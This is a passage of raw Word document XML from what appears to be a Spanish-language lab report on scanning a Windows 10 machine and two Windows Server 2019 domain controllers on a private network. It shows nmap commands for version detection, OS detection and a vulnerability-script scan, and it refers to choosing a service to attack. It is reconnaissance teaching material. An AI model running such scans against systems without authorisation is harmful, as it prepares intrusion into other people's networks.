                          <w:p w14:paraId="215D2BF1" w14:textId="49AFEFA4" w:rsidR="00C70B96" w:rsidRDefault="00C70B96" w:rsidP="00C70B96">
                            <w:r w:rsidRPr="00C70B96">
                              <w:t>nmap -sV -p</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">- </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00C70B96">
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:t>192.168.1.80</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="348DBB11" w14:textId="77777777" w:rsidR="00C70B96" w:rsidRDefault="00C70B96"/>
                          <w:p w14:paraId="75FAEFA0" w14:textId="7A7F070D" w:rsidR="00C70B96" w:rsidRDefault="00C70B96">
                            <w:r>
                              <w:t>La opción -sV nos permitirá ver las versiones que corren en cada puerto.</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                      <w10:wrap type="square"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
          </w:p>
          <w:p w14:paraId="475C76CF" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="536A07CF" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="7F1D89CA" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="3697AF09" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="72623102" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="43E0593A" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="775FAA91" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="4B3261A9" w14:textId="723AF0C4" w:rsidR="00D67ED3" w:rsidRDefault="00771E50" w:rsidP="00D67ED3">
            <w:r>
              <w:t>Esta es la información obtenida del Windows 10:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02FB2089" w14:textId="77777777" w:rsidR="00771E50" w:rsidRDefault="00771E50" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="3DB372A2" w14:textId="7CDD1E48" w:rsidR="00D67ED3" w:rsidRDefault="00CF416C" w:rsidP="00D67ED3">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49DFA7AB" wp14:editId="24301A2C">
                  <wp:extent cx="6645910" cy="6645910"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
                  <wp:docPr id="860998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8799" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId69">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5A42C7D3" w14:textId="77777777" w:rsidR="00CF416C" w:rsidRDefault="00CF416C" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="3F512CDC" w14:textId="48F78FD3" w:rsidR="00CF416C" w:rsidRDefault="00CF416C" w:rsidP="00D67ED3">
            <w:r>
              <w:t>Encontrando la versión del servicio que vamos atacar.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75305CF2" w14:textId="77777777" w:rsidR="00D67ED3" w:rsidRDefault="00D67ED3" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="23D7048C" w14:textId="54C9CFEA" w:rsidR="00D67ED3" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3">
            <w:r>
              <w:t>Ahora mostraré la información obtenida del Windows Server2019 DC01:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B6F4A4C" w14:textId="77777777" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="725FBA17" w14:textId="77777777" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="1E15CFA2" w14:textId="77777777" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="20BBC87D" w14:textId="77777777" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="30BA94F8" w14:textId="5CEC7BB1" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3">
            <w:r w:rsidRPr="00D400FC">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77523008" wp14:editId="270990FA">
                  <wp:extent cx="6645910" cy="6638925"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
                  <wp:docPr id="1276585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5034" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId70">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6645910" cy="6638925"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="572286E6" w14:textId="77777777" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="6549E112" w14:textId="495EACC6" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3">
            <w:r>
              <w:t>Obteniendo Los servicios que aparecen en la imagen.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33EC2EC4" w14:textId="77777777" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="33387F8C" w14:textId="77777777" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="28987041" w14:textId="77777777" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="09B345F0" w14:textId="77777777" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="25B1523A" w14:textId="3E160B13" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Ahora vamos con el Windows Server 2019 DC02:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C667255" w14:textId="77777777" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="22BD9A9E" w14:textId="7C371A78" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3">
            <w:r w:rsidRPr="00D400FC">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68FF6F98" wp14:editId="2A68F9C1">
                  <wp:extent cx="6645910" cy="6638925"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
                  <wp:docPr id="460216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6607" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId71">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6645910" cy="6638925"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="52D8109C" w14:textId="77777777" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="5A5C729A" w14:textId="58BE0B0B" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3">
            <w:r>
              <w:t>Obteniendo los servicios que aparecen en la imagen de arriba.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E4ABE81" w14:textId="77777777" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="600FEF35" w14:textId="378AE787" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3">
            <w:r>
              <w:t>Ahora vamos a usar este escaneo con nmap para detectar los sistemas operativos:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DB49614" w14:textId="77777777" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="1B5F43A9" w14:textId="1A83CCD6" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3">
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251752448" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4D55F3CD" wp14:editId="7576D2F1">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:align>center</wp:align>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>182880</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2360930" cy="1404620"/>
                      <wp:effectExtent l="95250" t="95250" r="87630" b="99695"/>
                      <wp:wrapSquare wrapText="bothSides"/>
                      <wp:docPr id="1353806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5C64C7EE" w14:textId="4A030CAE" w:rsidR="00D400FC" w:rsidRDefault="00D400FC">
                                  <w:r>
                                    <w:t>namp -O 192.168.1.</w:t>
                                  </w:r>
                                  <w:r w:rsidR="00DB4357">
                                    <w:t>135</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="1A76A6E3" w14:textId="2A73135C" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00DB4357">
                                  <w:r>
                                    <w:t>namp -O 192.168.1.80</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="5866025C" w14:textId="5B23EEFA" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00DB4357">
                                  <w:r>
                                    <w:t>namp -O 192.168.1.79</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="2399A545" w14:textId="77777777" w:rsidR="00DB4357" w:rsidRDefault="00DB4357"/>
                                <w:p w14:paraId="1E77F934" w14:textId="2C36A1E0" w:rsidR="00DB4357" w:rsidRDefault="00DB4357">
                                  <w:r>
                                    <w:t>Con la opción -O podremos obtener los sitemas operativos de cada h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55F3CD" id="_x0000_s1031" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2517524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5C64C7EE" w14:textId="4A030CAE" w:rsidR="00D400FC" w:rsidRDefault="00D400FC">
                            <w:r>
                              <w:t>namp -O 192.168.1.</w:t>
                            </w:r>
                            <w:r w:rsidR="00DB4357">
                              <w:t>135</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1A76A6E3" w14:textId="2A73135C" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00DB4357">
                            <w:r>
                              <w:t>namp -O 192.168.1.80</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5866025C" w14:textId="5B23EEFA" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00DB4357">
                            <w:r>
                              <w:t>namp -O 192.168.1.79</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2399A545" w14:textId="77777777" w:rsidR="00DB4357" w:rsidRDefault="00DB4357"/>
                          <w:p w14:paraId="1E77F934" w14:textId="2C36A1E0" w:rsidR="00DB4357" w:rsidRDefault="00DB4357">
                            <w:r>
                              <w:t>Con la opción -O podremos obtener los sitemas operativos de cada host.</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                      <w10:wrap type="square"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A427E8C" w14:textId="77777777" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="1E564E0E" w14:textId="77777777" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="5CF00250" w14:textId="77777777" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="4A71C4C3" w14:textId="77777777" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="66CBBFBE" w14:textId="77777777" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="3EDCEB02" w14:textId="77777777" w:rsidR="00D400FC" w:rsidRDefault="00D400FC" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="09B2165D" w14:textId="77777777" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="6888DEB3" w14:textId="77777777" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="2197F0FD" w14:textId="25EB1098" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00D67ED3">
            <w:r>
              <w:t>Ninguno consigue descubrir el sistema operativo que es, para que lo descubriera tendría que tener más servicios corriendo:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50534ED7" w14:textId="54949A42" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00D67ED3">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63EEA83F" wp14:editId="55B963A9">
                  <wp:extent cx="6645910" cy="4673600"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="121160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2056" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId72">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6645910" cy="4673600"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="2024F427" w14:textId="77777777" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="42DF5C49" w14:textId="2AFC63BD" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00D67ED3">
            <w:r w:rsidRPr="00DB4357">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F8B1783" wp14:editId="0611CBDE">
                  <wp:extent cx="6645910" cy="6631940"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="337336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6573" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId73">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6645910" cy="6631940"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="0756B57A" w14:textId="77777777" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="6046F113" w14:textId="13DDB84C" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00D67ED3">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BF3FF45" wp14:editId="1A94D4BB">
                  <wp:extent cx="6645910" cy="6645910"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
                  <wp:docPr id="1254237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37458" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId74">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EFB2402" w14:textId="77777777" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="18BE3309" w14:textId="181AC505" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00D67ED3">
            <w:r>
              <w:t>Lo único que obtenemos en claro es que la distancia al objetivo es de un salto eso quiere decir que estamos conectados al mismo router, porque con cada salta sería un router.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B45298F" w14:textId="77777777" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="0A25F0CE" w14:textId="77777777" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="79D1DCE8" w14:textId="77777777" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="4A536759" w14:textId="77777777" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="6B56C794" w14:textId="77777777" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="7D397BEE" w14:textId="2F8086AC" w:rsidR="00DB4357" w:rsidRDefault="00526B7F" w:rsidP="00D67ED3">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Por último realizaré un escaneo exhaustivo con nmap:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4157275E" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="5BBBA334" w14:textId="6AAE746B" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00D67ED3">
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251754496" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="41B511E0" wp14:editId="33626A49">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>1981835</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>276225</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2360930" cy="5208270"/>
                      <wp:effectExtent l="95250" t="133350" r="104140" b="125730"/>
                      <wp:wrapSquare wrapText="bothSides"/>
                      <wp:docPr id="16548917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827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7CC4BBE8" w14:textId="447630F5" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00526B7F">
                                  <w:r w:rsidRPr="00526B7F">
                                    <w:t>nmap -p- -T4 -sV -O --script=vuln &lt;IP_del_host&gt;</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="2269B6EF" w14:textId="4117ADE0" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00526B7F">
                                  <w:r>
                                    <w:t>- "-p-": esta opción indica a Nmap que escanee todos los puertos.</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="4C9BA7D8" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00526B7F">
                                  <w:r>
                                    <w:t>- "-T4": esta opción especifica la plantilla de tiempo que se utilizará para el escaneo. En este caso, se utiliza T4, que establece la velocidad de escaneo en "agresiva".</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="0A82EC14" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00526B7F">
                                  <w:r>
                                    <w:t>- "-sV": esta opción habilita la detección de versiones, lo que significa que Nmap intentará identificar las versiones de los servicios que se ejecutan en los puertos de destino.</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="5BA7703D" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00526B7F">
                                  <w:r>
                                    <w:t>- "-O": esta opción habilita la detección del sistema operativo, lo que significa que Nmap intentará identificar el sistema operativo del host de destino.</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="4189BE1C" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00526B7F">
                                  <w:r>
                                    <w:t>- "--script=vuln": esta opción indica a Nmap que ejecute el script "vuln", que escanea vulnerabilidades en los servicios que se ejecutan en los puertos de destino.</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="5C4F0BDE" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00526B7F"/>
                                <w:p w14:paraId="5CE4FD32" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00526B7F"/>
                                <w:p w14:paraId="4B2931CE" w14:textId="377C3BE4" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00526B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B511E0" id="_x0000_s1032" type="#_x0000_t202" style="position:absolute;margin-left:156.05pt;margin-top:21.75pt;width:185.9pt;height:410.1pt;z-index:251754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" fillcolor="#91bce3 [2168]" stroked="f" strokeweight=".5pt">
                      <v:fill color2="#7aaddd [2616]" rotate="t" colors="0 #b1cbe9;.5 #a3c1e5;1 #92b9e4" focus="100%" type="gradient">
                        <o:fill v:ext="view" type="gradientUnscaled"/>
                      </v:fill>
                      <v:shadow on="t" type="perspective" color="black" opacity="26214f" offset="0,0" matrix="66847f,,,66847f"/>
                      <v:textbox>
                        <w:txbxContent>
                          <w:p w14:paraId="7CC4BBE8" w14:textId="447630F5" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00526B7F">
                            <w:r w:rsidRPr="00526B7F">
                              <w:t>nmap -p- -T4 -sV -O --script=vuln &lt;IP_del_host&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2269B6EF" w14:textId="4117ADE0" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00526B7F">
                            <w:r>
                              <w:t>- "-p-": esta opción indica a Nmap que escanee todos los puertos.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4C9BA7D8" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00526B7F">
                            <w:r>
                              <w:t>- "-T4": esta opción especifica la plantilla de tiempo que se utilizará para el escaneo. En este caso, se utiliza T4, que establece la velocidad de escaneo en "agresiva".</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0A82EC14" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00526B7F">
                            <w:r>
                              <w:t>- "-sV": esta opción habilita la detección de versiones, lo que significa que Nmap intentará identificar las versiones de los servicios que se ejecutan en los puertos de destino.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5BA7703D" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00526B7F">
                            <w:r>
                              <w:t>- "-O": esta opción habilita la detección del sistema operativo, lo que significa que Nmap intentará identificar el sistema operativo del host de destino.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4189BE1C" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00526B7F">
                            <w:r>
                              <w:t>- "--script=vuln": esta opción indica a Nmap que ejecute el script "vuln", que escanea vulnerabilidades en los servicios que se ejecutan en los puertos de destino.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5C4F0BDE" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00526B7F"/>
                          <w:p w14:paraId="5CE4FD32" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00526B7F"/>
                          <w:p w14:paraId="4B2931CE" w14:textId="377C3BE4" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00526B7F"/>
                        </w:txbxContent>
                      </v:textbox>
                      <w10:wrap type="square"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
          </w:p>
          <w:p w14:paraId="38F8836C" w14:textId="77777777" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="35C79F11" w14:textId="77777777" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="709E1604" w14:textId="77777777" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="7D135D44" w14:textId="77777777" w:rsidR="00DB4357" w:rsidRDefault="00DB4357" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="762169B8" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="41474B8E" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="616B7421" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="734BA3BC" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="109BF425" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="63021BDB" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="34322FA1" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="0CB2CD38" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="7FDBFB61" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="1C75ADA0" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="354B333B" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="12051D38" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="24BA724C" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="12ADC4D0" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00D67ED3"/>
          <w:p w14:paraId="2C46E34D" w14:textId="77777777" w:rsidR="00526B7F" w:rsidRDefault="00526B7F" w:rsidP="00D67ED3"/>
